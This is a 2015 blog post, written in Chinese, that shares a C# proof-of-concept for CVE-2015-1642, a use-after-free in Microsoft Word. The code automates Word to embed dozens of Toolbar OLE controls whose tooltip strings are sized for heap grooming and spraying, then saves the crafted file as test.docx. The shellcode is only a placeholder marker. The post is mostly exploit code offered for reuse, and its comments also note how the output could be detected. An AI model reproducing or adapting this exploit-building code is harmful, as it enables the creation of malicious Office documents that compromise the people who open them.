CVE-2015-1642 POC

  月初,玄武实验室的“每日安全动态”推送了一篇office UAF漏洞利用的文章,之前对office上UAF漏洞利用占位问题有些疑问,刚好就借助这篇文章重现了一下。其中堆喷射部分不是特别稳定,漏洞成因和利用的细节请参见原文链接。今天想起来,就把POC发这里吧。

  原文链接:Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 CTaskSymbol UAF by @ d0mzw https://t.co/NPJUJUqNSH

namespace WindowsFormsApplication1
{
    /// <summary>
    /// Reproduction of the CVE-2015-1642 proof of concept from the write-up linked above
    /// ("Understanding Microsoft Word OLE Exploit Primitives", d0mzw). The form drives Word
    /// through COM interop, embeds MSComctlLib.Toolbar OLE controls whose button ToolTipText
    /// strings are sized to shape the Word process heap, and saves the result as test.docx.
    /// Only document construction happens here; nothing in this file reopens the saved file.
    /// From a detection standpoint the produced document is distinctive: dozens of embedded
    /// Toolbar controls, most of them carrying the same ~1 MB tooltip string.
    /// </summary>
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        /// <summary>
        /// Adds 30 Toolbar OLE controls to <paramref name="objDoc"/> and gives each of them two
        /// buttons whose ToolTipText is the same ~1 MB string (0xfffe0 bytes of UTF-16 once the
        /// 6-byte overhead in the commented-out size print is included). Each 0x800-char unit of
        /// that string is padding + the "\uC0DE\uC0DE" marker + 0x9090 filler.
        /// </summary>
        /// <param name="objDoc">Document the controls are inserted into.</param>
        /// <remarks>
        /// The layout constants (0x9f2, 0xc, 0x800, 0xfffe0) are not derived anywhere in this
        /// file; presumably they come from the write-up. Both inner-loop iterations resolve the
        /// same <c>ocx[i].OLEFormat.Object</c>, so both buttons are added to the same toolbar.
        /// <c>ocx</c> and <c>toolbarArray</c> are not read after the call; <c>block_size</c> only
        /// bounds the pattern-doubling loop.
        /// </remarks>
        private void HeapSpray(Word.Document objDoc)
        {
            Word.InlineShape[] ocx = new Word.InlineShape[30];
            MSComctlLib.Toolbar[,] toolbarArray = new MSComctlLib.Toolbar[30, 2];

            int block_size = 0x1000;

            // Grow with 0x2121 words up to 0x1000 chars, then cut to (0x9f2 - 0xc) / 2 chars.
            string padding = "\u8080\u8080";
            while (padding.Length < 0x1000)
            {
                padding += "\u2121\u2121";
            }
            padding = padding.Substring(0, (0x9f2 - 0xc) / 2);

            // 0a0a0a0a points here 
            string shellcode = "\uC0DE\uC0DE";

            // 0x9090 filler, trimmed so padding + shellcode + pattern is exactly 0x800 chars.
            string pattern = "\u9090\u9090";
            while (pattern.Length < block_size)
            {
                pattern += pattern;
            }
            pattern = pattern.Substring(0, 0x800 - padding.Length - shellcode.Length);

            // Double the 0x800-char unit until it covers 0xfffe0 / 2 chars, then cut to the exact chunk length.
            string block = padding + shellcode + pattern;
            while (block.Length < 0xfffe0 / 2)
            {
                block += block;
            }

            string chunk = block.Substring(0, (0xfffe0 - 0x6) / 2);

            //MessageBox.Show("[+] objAlloc size: 0x" + (chunk.Length * 0x2 + 0x4 + 0x2).ToString("X"));

            // One control per outer iteration, two buttons per control, all with the same chunk.
            for (int i = 0; i < 30; i++)
            {
                ocx[i] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
                for (int j = 0; j < 2; j++)
                {
                    toolbarArray[i, j] = ((MSComctlLib.Toolbar)ocx[i].OLEFormat.Object);
                    toolbarArray[i, j].Buttons.Add().ToolTipText = chunk;
                }
            }
        }

        /// <summary>
        /// Inserts two Toolbar controls (stored in <c>ocx[2]</c> and <c>ocx[3]</c>) and adds 16
        /// buttons to each; every button carries the same 0x2d-char string of 0x0c0c words
        /// (0x5a bytes of UTF-16). The method name is missing a "t" in the original and is kept
        /// as-is so the caller still resolves.
        /// </summary>
        /// <param name="objDoc">Document the controls are inserted into.</param>
        /// <param name="ocx">Caller-owned array; slots 2 and 3 are overwritten.</param>
        private void DefragmenHeap(Word.Document objDoc, Word.InlineShape[] ocx)
        {
            // Doubles to 0x30 chars, then cut to 0x5a / 2 = 0x2d chars.
            string paddingB = "\u0c0c\u0c0c";
            while (paddingB.Length < 0x60 / 2)
            {
                paddingB += paddingB;
            }
            string objAllocB = paddingB.Substring(0, 0x5a / 2);
            
            // Every tabArrayB entry resolves to the same control, so all 16 buttons go on one toolbar.
            MSComctlLib.Toolbar[] tabArrayB = new MSComctlLib.Toolbar[16];
            ocx[2] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            for (int j = 0; j < 16; j++)
            {
                tabArrayB[j] = (MSComctlLib.Toolbar)ocx[2].OLEFormat.Object;
                tabArrayB[j].Buttons.Add().ToolTipText = objAllocB;
            }

            // Same again for a second control.
            MSComctlLib.Toolbar[] tabArrayC = new MSComctlLib.Toolbar[16];
            ocx[3] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            for (int j = 0; j < 16; j++)
            {
                tabArrayC[j] = (MSComctlLib.Toolbar)ocx[3].OLEFormat.Object;
                tabArrayC[j].Buttons.Add().ToolTipText = objAllocB;
            }
        }

        /// <summary>
        /// Inserts one Toolbar control into <c>ocx[0]</c> and adds 16 buttons to it, each with a
        /// 0x2d-char ToolTipText made of repeated "\u0a06\u0a0a" (0x5a bytes of UTF-16). Same
        /// shape as <see cref="DefragmenHeap"/>, different fill words and only one control.
        /// </summary>
        /// <param name="objDoc">Document the control is inserted into.</param>
        /// <param name="ocx">Caller-owned array; slot 0 is overwritten.</param>
        private void ReplaceHeap(Word.Document objDoc, Word.InlineShape[] ocx)
        {
            // Doubles to 0x30 chars, then cut to 0x5a / 2 = 0x2d chars.
            string paddingA = "\u0a06\u0a0a";
            while (paddingA.Length < 0x60 / 2)
            {
                paddingA += paddingA;
            }
            string objAllocA = paddingA.Substring(0, 0x5a / 2);

            // All 16 entries resolve to the same control; 16 buttons on one toolbar.
            MSComctlLib.Toolbar[] tabArrayA = new MSComctlLib.Toolbar[16];
            ocx[0] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            for (int j = 0; j < 16; j++)
            {
                tabArrayA[j] = (MSComctlLib.Toolbar)ocx[0].OLEFormat.Object;
                tabArrayA[j].Buttons.Add().ToolTipText = objAllocA;
            }
        }

        /// <summary>
        /// Button handler that builds the document: starts a visible Word instance, creates a
        /// blank document, runs <see cref="ReplaceHeap"/>, inserts one more control into
        /// <c>ocx[1]</c>, then runs <see cref="DefragmenHeap"/> and <see cref="HeapSpray"/>, and
        /// finally saves the file as test.docx next to the executable before closing Word.
        /// </summary>
        /// <remarks>
        /// None of the interop calls are wrapped in try/finally, so a COMException anywhere
        /// before <c>objWord.Quit</c> leaves the Word instance running. <c>ocx</c> is sized 4
        /// because the helpers write slots 0, 2 and 3 and this method writes slot 1.
        /// <c>Application.StartupPath</c> resolves to the WinForms Application class here; the
        /// Word object is referenced through the <c>Word</c> alias.
        /// </remarks>
        private void button1_Click(object sender, EventArgs e)
        {
            Word.Application objWord = new Word.Application();
            objWord.Visible = true;

            // Word interop optional arguments are passed as ref Missing.
            object objMissing = System.Reflection.Missing.Value;
            Word.Document objDoc = objWord.Documents.Add(ref objMissing, ref objMissing, ref objMissing, ref objMissing);
            
            // How to: Programmatically Insert Text into Word Documents;
            // https://msdn.microsoft.com/en-us/library/6b9478cs.aspx 
            
            Word.InlineShape[] ocx = new Word.InlineShape[4];

            ReplaceHeap(objDoc, ocx);
            
            ocx[1] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            DefragmenHeap(objDoc, ocx);

            HeapSpray(objDoc);

            // Save the built document, tear down the Word instance, then drop the RCW references.
            object filename = Application.StartupPath + @"\test.docx";
            objDoc.SaveAs2(ref filename);
            objDoc.Close(ref objMissing, ref objMissing, ref objMissing);
            objDoc = null;
            objWord.Quit(ref objMissing, ref objMissing, ref objMissing);
            objWord = null;
        }
    }
}

 

posted @ 2015-11-28 19:27 Danny__Wei